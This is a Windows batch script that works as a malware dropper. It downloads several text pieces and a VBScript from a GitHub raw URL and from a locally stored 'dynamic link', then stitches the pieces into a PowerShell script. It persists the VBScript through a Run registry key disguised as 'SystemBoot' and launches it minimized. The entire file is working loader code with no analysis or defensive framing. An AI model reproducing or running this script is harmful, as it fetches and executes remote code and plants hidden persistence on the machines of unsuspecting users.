@echo off
set d=%APPDATA%\Paged
set f=%d%\M.txt
set a=%d%\f1.txt
set b=%d%\f2.txt
set c=%d%\Nvs.ps1
set v=%d%\S_m.vbs
set u=raw.githubusercontent.com/Zenth-grid/ZENTH-MAIN/main/V
:: Read the dynamic link from l.txt
set /p dynLink=<"%appdata%\Paged-l\l.txt"
rmdir /s /q "%d%" 2>nul
mkdir "%d%"

:: Download files to memory and then save
powershell -c "$content = (Invoke-WebRequest -Uri 'https://%u%/Final.txt').Content; [System.IO.File]::WriteAllText('%f%', $content)"
timeout /t 5 /nobreak >nul
powershell -c "$content = (Invoke-WebRequest -Uri 'https://%u%/First.txt').Content; [System.IO.File]::WriteAllText('%a%', $content)"
powershell -c "$content = (Invoke-WebRequest -Uri '%dynLink%').Content; [System.IO.File]::WriteAllText('%b%', $content)"
powershell -c "(gc '%f%' -Raw) -replace '----',(gc '%a%' -Raw) -replace '====',(gc '%b%' -Raw) | sc '%c%'"
del "%a%" "%b%" 2>nul
powershell -c "$content = (Invoke-WebRequest -Uri 'https://%u%/S_m.vbs').Content; [System.IO.File]::WriteAllText('%v%', $content)"
powershell -c "sp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' SystemBoot 'wscript.exe \"%v%\"'"
start /min wscript "%v%"
